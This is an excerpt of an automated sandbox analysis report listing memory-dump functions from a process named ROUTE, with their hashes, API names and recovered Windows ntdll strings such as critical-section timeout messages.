                                                                                                                            • Opcode Fuzzy Hash: 6e578b878be74098917343d695d2a51f32c8d2ed80991d1ede1da86247c354e8
                                                                                                                            • Instruction Fuzzy Hash: B19141F04482948AC7158F59A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: 3bfa10e8e87b14f57550acd3b4b5f115a3f42e1cba083847c97ab048ac4faa3a
                                                                                                                            • Instruction ID: 8263e148c2bd3ce1f32d9686b3cb0a9c6ff524894d256ae3dd5a56567fa11e06
                                                                                                                            • Opcode Fuzzy Hash: 3bfa10e8e87b14f57550acd3b4b5f115a3f42e1cba083847c97ab048ac4faa3a
                                                                                                                            • Instruction Fuzzy Hash: 5251E6BAA00116BFDB15DBA88CD497FF7BCBF09201714C669E4E5D7681D234DE508BA0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: 4a7e297fa8348768bb105b88ccf91f3284ae2aaa30b178e1f146f952409b5052
                                                                                                                            • Instruction ID: 3e9221583bcac7aeb30f13aa1543f3b108cd4690c11fe5dd766cc6c7000cb7fe
                                                                                                                            • Opcode Fuzzy Hash: 4a7e297fa8348768bb105b88ccf91f3284ae2aaa30b178e1f146f952409b5052
                                                                                                                            • Instruction Fuzzy Hash: C851D4B5A00645AECB34DE5CCCD097FF7FDEB44240B048859E596D7641E7B8EA80C760
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541270412.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_31a0000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ##.`$#&$*$&#*`$&$*o$&;`y$.).=$??#*$a{og$a}a{$o${$|vx}
                                                                                                                            • API String ID: 0-3596917867
                                                                                                                            • Opcode ID: 7a11c76c9737fc9a91b10bddbb426355f46157ad682ba83da3993119e561a5bf
                                                                                                                            • Instruction ID: 39c6fcd103d8773fbba2cbbd654518ef8bc9f6e5c2e3be9cff7c01174d315633
                                                                                                                            • Opcode Fuzzy Hash: 7a11c76c9737fc9a91b10bddbb426355f46157ad682ba83da3993119e561a5bf
                                                                                                                            • Instruction Fuzzy Hash: FB3185F081464CDBCF19DF88E6816EEBFB2FF28344F805259E9056F240D7B58A558B89
                                                                                                                            Strings
                                                                                                                            • Execute=1, xrefs: 03334713
                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03334787
                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03334742
                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03334655
                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03334725
                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033346FC
                                                                                                                            • ExecuteOptions, xrefs: 033346A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                            • API String ID: 0-484625025
                                                                                                                            • Opcode ID: cb93b6c71b21f9c49421d9457735748630f8e8390f5fc79f1f775b3744f6b260
                                                                                                                            • Instruction ID: 3bf56e0dae5defb7f70fc4168ba3f1abe6709bc9ecd1cba637586589a7213a71
                                                                                                                            • Opcode Fuzzy Hash: cb93b6c71b21f9c49421d9457735748630f8e8390f5fc79f1f775b3744f6b260
                                                                                                                            • Instruction Fuzzy Hash: 4A51F935A203196FDF10EBADDCD5FADB7ACAF08750F0400A9E605AB1D1E770AA858F50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                            • Instruction ID: 7bd1e1a5bbd20d77c2501ecfddbc7213ebc38caf9e03a3a2d360a44b8e9840a1
                                                                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                            • Instruction Fuzzy Hash: 78023675909341AFE705CF18C991A6FB7E9EFC8710F04892EF9855B2A4DB31E905CB42
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-$0$0
                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction ID: a037f30430cd7d94b1cbc4973026490265b817ec6d7611299e2dae1b0235ccc8
                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction Fuzzy Hash: 8881AD34E052499ADF28CE68C8E17BEFBB6AF45710F1C465AE861A73D0C734D8408B64
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                            • Opcode ID: 79aed85bb2d4ee9d041ee49a8e6d691e88a98696b5c3755d1a1cce091082ab2d
                                                                                                                            • Instruction ID: 19706df4998d5d788948bc5e64dc17c3e2f20da00359d0fa758f18e68ee6d334
                                                                                                                            • Opcode Fuzzy Hash: 79aed85bb2d4ee9d041ee49a8e6d691e88a98696b5c3755d1a1cce091082ab2d
                                                                                                                            • Instruction Fuzzy Hash: 9021627AE00259ABCB20DF79CC90AEFB7FCEF44640F080516E955E7240EB34DA018BA1
                                                                                                                            Strings
                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033302BD
                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033302E7
                                                                                                                            • RTL: Re-Waiting, xrefs: 0333031E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                            • API String ID: 0-2474120054
                                                                                                                            • Opcode ID: c304cc3d3140dfd4ff1450d64b43c43a7f585289c3078da759580000564a1298
                                                                                                                            • Instruction ID: 491ee489be743a207b8b6e0a47bb9b8c9b910ce28b7e069ad004c3e64b0c43c7
                                                                                                                            • Opcode Fuzzy Hash: c304cc3d3140dfd4ff1450d64b43c43a7f585289c3078da759580000564a1298
                                                                                                                            • Instruction Fuzzy Hash: 22E1F034628741AFD728CF28C985B2AB7E4BF85324F194A5DF5A6CB2D0D774D884CB42
                                                                                                                            Strings
                                                                                                                            • RTL: Resource at %p, xrefs: 03337B8E
                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03337B7F
                                                                                                                            • RTL: Re-Waiting, xrefs: 03337BAC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 0-871070163
                                                                                                                            • Opcode ID: e911ca5192457d430106a3d2097a7b85d6013b638a8d9bc632d9354305b3fe99
                                                                                                                            • Instruction ID: 328c9e606c14fa34baa2ac9a8ebfa860d995bb7990c3bb172dfb6e5479f3dc14
                                                                                                                            • Opcode Fuzzy Hash: e911ca5192457d430106a3d2097a7b85d6013b638a8d9bc632d9354305b3fe99
                                                                                                                            • Instruction Fuzzy Hash: A241F4357207029FD724CE29CC90B6AF7E5EF89710F040A2DF956DB680DB70E4458B91
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0333728C
                                                                                                                            Strings
                                                                                                                            • RTL: Resource at %p, xrefs: 033372A3
                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03337294
                                                                                                                            • RTL: Re-Waiting, xrefs: 033372C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                            • Opcode ID: 6fde0b5029a6636259e33714fb427a224fc2b8dd8360b383dcd9c73e2f48b810
                                                                                                                            • Instruction ID: e2c1a4dc71a7f683dd71b3c0b3bbceb8115b5831a030226aa174b47127fcee93
                                                                                                                            • Opcode Fuzzy Hash: 6fde0b5029a6636259e33714fb427a224fc2b8dd8360b383dcd9c73e2f48b810
                                                                                                                            • Instruction Fuzzy Hash: 6D411F79B14702AFD720CE24CC81F6AF7A5FB85710F184629F955EB680DB20F8828BD0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                            • Opcode ID: d8daeb2015fb649e6146f1bfc3e5c30231ebe9db14d42e6e07a15e742c334c47
                                                                                                                            • Instruction ID: ab6e3f296b7e7c9e80fe3b112ae37538d2ce808cb67ed5a0cfa56cbca1b0d751
                                                                                                                            • Opcode Fuzzy Hash: d8daeb2015fb649e6146f1bfc3e5c30231ebe9db14d42e6e07a15e742c334c47
                                                                                                                            • Instruction Fuzzy Hash: C4317576A102199FDB34DF29DC80BEFB7F8EF44650F444956E849E7240EB34AA548FA0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-
                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                            • Instruction ID: 8a2e279bf65837a53f18dfab47f181431b884a01fb55d0a035d483a624b25c25
                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                            • Instruction Fuzzy Hash: BF91C470E0021A9BDF24DF69CCE06BEB7A9FF44760F18461AE865EB2D0D734A941CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$@
                                                                                                                            • API String ID: 0-1194432280
                                                                                                                            • Opcode ID: 41c291eee83a09bae990ae9cab362bc3b805788084ec144bcbf77da519e7201b
                                                                                                                            • Instruction ID: d9962a72efe6997309a6c6351971126e017f04bfd293f796afd7a489cd8b5ebc
                                                                                                                            • Opcode Fuzzy Hash: 41c291eee83a09bae990ae9cab362bc3b805788084ec144bcbf77da519e7201b
                                                                                                                            • Instruction Fuzzy Hash: DA811C76D102699BDB71DB54CC45BEEB7B8AB08710F0445DAE919B7240E7709EC4CFA0